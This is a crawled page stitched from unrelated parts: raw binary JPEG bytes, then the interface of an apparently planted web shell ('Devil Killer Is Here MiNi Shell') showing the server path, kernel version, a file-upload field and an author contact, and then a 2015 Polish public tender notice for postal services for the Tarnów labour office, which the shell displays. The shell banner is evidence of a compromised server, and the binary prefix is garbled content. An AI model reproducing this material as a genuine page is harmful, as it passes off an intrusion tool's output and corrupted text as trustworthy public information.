JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/332862-N-2015.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest świadczenie - na rzecz Powiatowego Urzędu Pracy w Tarnowie,  usług pocztowych w obrocie krajowym i zagranicznym, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich zwrotów.</b><br>
<b>Numer ogłoszenia: 332862 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest świadczenie - na rzecz Powiatowego Urzędu Pracy w Tarnowie,  usług pocztowych w obrocie krajowym i zagranicznym, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich zwrotów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym 
i zagranicznym w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych i ich zwrotów na rzecz Powiatowego Urzędu Pracy w Tarnowie, jego Filii PUP w Tuchowie i Żabnie oraz Lokalnego Punktu Informacyjno-Konsultacyjnego 
w Radłowie, w okresie od 1 stycznia 2016 r. do 31 grudnia 2016 r.
2.	Usługi pocztowe, będące przedmiotem niniejszego zamówienia, muszą być realizowane zgodnie z następującymi przepisami:
- ustawą z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r. poz. 1529) oraz aktami   wykonawczymi wydanymi na jej podstawie, 
- ustawą z dnia 14 czerwca 1960 r. - Kodeks postępowania administracyjnego (Dz. U.   z 2013 r. poz. 267, z późn. zm.),
- w przypadku usługi pocztowej w obrocie zagranicznym - zgodnie 
  z międzynarodowymi przepisami pocztowymi. 
3.	Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się przesyłki listowe
(gabaryt A i gabaryt B) o wadze do 2000 g oraz paczki pocztowe (gabaryt A) o wadze 
do 5000 g.
4.	Przez przesyłki listowe (gabaryt A i gabaryt B) o wadze do 2000 g rozumie się:
a)	listy zwykłe krajowe, 
b)	listy zwykłe priorytetowe krajowe,
c)	listy zwykłe polecone krajowe,
d)	listy polecone priorytetowe krajowe, 
e)	listy polecone priorytetowe zagraniczne,
  Gabaryt A to przesyłki listowe o wymiarach:
  minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
  maksimum - żaden z wymiarów nie może przekroczyć: wysokości 20 mm, długości 
                      325 mm, szerokości 230 mm. 
  Gabaryt B to przesyłki listowe o wymiarach:
  minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm 
                 lub szerokość 230 mm, 
  maksimum - suma długości, szerokości i wysokości 900 mm, przy czym największy z tych 
                        wymiarów (długość) nie może przekroczyć  600 mm. 
5.	Przez paczki pocztowe (gabaryt A) o wadze do 5000 g rozumie się:
     a) paczki zwykłe krajowe,
     b) paczki priorytetowe krajowe. 
Gabaryt A to paczki o wymiarach:
    minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
    maksimum - żaden z wymiarów nie może przekroczyć: długości 600 mm, szerokości 500 mm, wysokości 300 mm.  
6. Wykonawca zobowiązany jest do odbioru przesyłek przygotowanych do wysłania, raz dziennie, w dni robocze, w godzinach pomiędzy 11.30 a 12.00 w następujących miejscach: 
     a) Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, pokój nr 220, II piętro, 
     b) Filia PUP w Tuchowie, ul. Jana III Sobieskiego 23, pokój nr 7, I piętro, 
     c) Filia PUP w Żabnie, Rynek 29, pokój nr 4, I piętro, 
     d) Lokalny Punkt Informacyjno-Konsultacyjny w Radłowie, ul. Brzeska 9. 
7.  Odbioru przesyłek będzie dokonywać upoważniony przedstawiciel Wykonawcy, 
po okazaniu stosownego upoważnienia. 
8. Odbiór przesyłek przygotowanych do wysłania będzie każdorazowo udokumentowany przez Wykonawcę poprzez przystawienie pieczęci, opatrzenie podpisem i datą w:
    a) książce nadawczej (dla przesyłek poleconych),
    b) zestawieniu ilościowym przesyłek wg poszczególnych kategorii wagowych (dla 
   przesyłek zwykłych),
    c) potwierdzeniu odbioru paczki pocztowej. 
9. Zamawiający zastrzega sobie możliwość dodatkowego nadawania przesyłek pocztowych bezpośrednio w placówkach pocztowych wskazanych przez Wykonawcę, oddalonych maksymalnie do 2,0 km od każdego z miejsc wskazanych poniżej:
     a) Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 
     b) Filia PUP w Tuchowie, ul. Jana III Sobieskiego 23,
     c) Filia PUP w Żabnie, Rynek 29,
     d) Lokalny Punkt Informacyjno-Konsultacyjny w Radłowie, ul. Brzeska 9. 
10. Zamawiający zobowiązuje się do umieszczenia na przesyłce listowej lub paczce nazwy 
 odbiorcy wraz z jego adresem (podanym jednocześnie w pocztowej książce nadawczej 
 dla  przesyłek rejestrowanych), określając rodzaj przesyłki (zwykła, polecona, priorytet, 
 ze zwrotnym potwierdzeniem odbioru) oraz umieszczenia nadruku (pieczątki) określającej 
 pełną nazwę i adres Zamawiającego na stronie adresowej każdej nadawanej przesyłki. 
11. Zamawiający zobowiązuje się do właściwego przygotowania przesyłek oraz 
 sporządzania  zestawień dla przesyłek nierejestrowanych i rejestrowanych.
12. Zamawiający zobowiązuje się do nadawania przesyłek w stanie uporządkowanym, przez 
 co należy rozumieć:
      a) dla przesyłek rejestrowanych - wpisanie każdej przesyłki pocztowej do książki 
     nadawczej w dwóch egzemplarzach, z których oryginał będzie przeznaczony 
     dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego 
     potwierdzenie nadania danej partii przesyłek,
      b) dla przesyłek nierejestrowanych - zestawienie ilościowe przesyłek wg poszczególnych 
      kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, 
      z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, 
      a kopia stanowić będzie dla Zamawiającego potwierdzenia nadania danej partii 
     przesyłek. 
13. Zamawiający jest odpowiedzialny za nadawanie przesyłek listowych i paczek w stanie 
  umożliwiającym Wykonawcy doręczenie danej przesyłki bez ubytku i uszkodzenia 
  do miejsca zgodnego z adresem przeznaczenia.
14. Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio 
 zabezpieczona, zgodnie z wymaganiami Wykonawcy w tym zakresie. Opakowanie paczki 
 powinno stanowić zabezpieczenie przed dostępem do zawartości oraz uniemożliwiać 
 uszkodzenie przesyłki w czasie przemieszczania. 
15. W przypadku, gdy przesyłki listowe oraz paczki wymagać będą specjalnego, odrębnego 
  oznakowania lub opakowania właściwego dla danego Wykonawcy, wówczas 
  Wykonawca jest zobowiązany dostarczyć we własnym zakresie wszelkie materiały 
  niezbędne do tego celu. 
16. Reklamacje z tytułu niewykonania usługi Zamawiający może zgłosić Wykonawcy 
 zgodnie z rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r.  w sprawie reklamacji usługi pocztowej (Dz. U. z 2013 r. poz. 1468).   
17. Wykonawca będzie dostarczał do każdej z wykazanych w pkt. 6 placówek 
     Zamawiającego, pokwitowane przez adresata potwierdzenie odbioru, niezwłocznie 
     po dokonaniu doręczenia przesyłki.
18. Wykonawca jest zobowiązany do dostarczania przesyłek zgodnie z przepisami ustawy 
    z dnia 14 czerwca 1960 r. - Kodeks postępowania administracyjnego (Dz. U. z 2013 r. 
     poz. 267, z późn. zm.).
19. Wykonawca zobowiązany jest również do doręczania przesyłek pocztowych zgodnie 
ze szczególnym trybem i sposobem określonym w Kodeksie postępowania administracyjnego oraz w innych przepisach prawa, dotyczących zachowania terminu nadania przesyłki. Wykonawca zapewni odpowiedni formularz potwierdzenia nadania przesyłki. Przesyłki pocztowe objęte szczególnym trybem opisanym powyżej będą przez Wykonawcę nadawane w dniu ich otrzymania od Zamawiającego.  
20. W załączniku nr 9 do SIWZ - formularz asortymentowo-cenowy zostały wyszczególnione rodzaje przesyłek jakie będą   zlecane Wykonawcy oraz orientacyjne ilości danej korespondencji w skali roku.   Zestawienie to daje podstawę do wyliczenia ceny. Zamawiający nie jest zobowiązany do zrealizowania w 100% podanych ilości przesyłek. Rodzaje i ilości przesyłek w ramach   świadczonych usług są szacunkowe i mogą ulec zmianie (zwiększyć się lub zmniejszyć) w zależności od potrzeb Zamawiającego 
na co Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian ilościowych i rodzajowych w trakcie realizacji zamówienia. Zamawiający zapłaci Wykonawcy wyłącznie za usługi faktycznie  wykonane. 
21.	Miesięczne wynagrodzenie Wykonawcy będzie ustalane jako suma opłat jednostkowych brutto zamieszczonych w formularzu asortymentowo-cenowym za przesyłki faktycznie nadane lub zwrócone w miesięcznym okresie rozliczeniowym. W przypadku przesyłek nieokreślonych w formularzu asortymentowo-cenowym rozliczenie dokonane zostanie zgodnie z obowiązującym cennikiem Wykonawcy (dotyczy to również przesyłek kurierskich)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej  ręki na podstawie z art. 67 ust. 1 pkt 6 Prawa zamówień publicznych, w zakresie  przedmiotowym określonym w załączniku nr 1 oraz nr 9 do SIWZ. Wielkość zamówienia  uzupełniającego stanowić będzie nie więcej niż 30% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	W celu wykazania posiadania uprawnień Wykonawca musi posiadać wpis do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej 
o którym mowa w art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r. poz. 1529).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Wykonawca musi posiadać doświadczenie polegające na wykonywaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - minimum dwóch zamówień o wartości co najmniej 150 000,00 zł brutto każde, polegające na świadczeniu usług pocztowych w obrocie krajowym i zagranicznym, w zakresie przyjmowania, przemieszczania, doręczania przesyłek pocztowych oraz ich zwrotów. Zamówienie musi być realizowane przez okres 
co najmniej 12 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Wykonawca musi posiadać co najmniej jedną placówkę nadawczo-oddawczą 
w następujących miejscowościach: Tarnów, Tuchów, Żabno, Radłów oraz co najmniej jedną placówkę oddawczą na terenie następujących gmin: Ciężkowice, Gromnik, Lisia Góra, Pleśna, Ryglice, Skrzyszów, Szerzyny, Wierzchosławice, Wietrzychowice, Wojnicz,  Zakliczyn. 
Wymienione placówki: 
- muszą być czynne w dni robocze od poniedziałku do piątku,
- muszą być oznakowane w sposób widoczny szyldem z nazwą lub logo Wykonawcy,
- jeżeli znajdują się w lokalu, w którym prowadzona jest również inna działalność  
   gospodarcza muszą posiadać wyodrębnione stanowisko obsługi klienta w zakresie usług 
   pocztowych, oznakowane w sposób widoczny z nazwą lub logo Wykonawcy. 
Każda placówka pocztowa musi zapewnić prawidłowe zabezpieczenie przesyłek przed dostępem osób trzecich, gwarantując zachowanie tajemnicy pocztowej oraz ochronę danych osobowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - oświadczenie - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku - oświadczenie - załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 2 do SIWZ).
2. Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6 
    do SIWZ).
3. Formularz asortymentowo-cenowy (załącznik nr 9 do SWIZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - Procentowy udział osób zatrudnionych na podstawie umowy o pracę (kryterium społeczne) - 0.10</li>
<li>3 - Możliwość bezpłatnego śledzenia przez Internet rejestrowanych przesyłek pocztowych w obrocie krajowym - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach i zakresie:
a)	w przypadku zmiany wysokości stawki podatku od towarów i usług - zmianie może ulec wysokość opłat za świadczone usługi zgodnie ze zmienionymi przepisami oraz wysokość wynagrodzenia Wykonawcy,
b)	w przypadku zmiany powszechnie obowiązujących przepisów prawa, w tym dotyczących funkcjonowania rynku usług pocztowych - w zakresie mającym wpływ na realizację usług świadczonych na podstawie zawartej umowy,
c)	w przypadku wystąpienia innych obiektywnych zmian niemożliwych do przewidzenia 
w momencie zawarcia umowy, a niezbędnych do prawidłowego wykonania przedmiotu umowy, jeśli taka zmiana leży w interesie publicznym lub jest korzystna dla Zamawiającego. 
Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej możliwość wprowadzenia zmiany 
i akceptacji tych zmian przez drugą ze stron. Pisemne zgłoszenie zawierać powinno propozycję zmiany umowy oraz jej uzasadnienie.
Wszelkie zmiany umowy wymagają dla swojej ważności formy pisemnej pod rygorem nieważności i będą dokonywane w postaci aneksu do zawartej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów, sekretariat (pok. 214).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com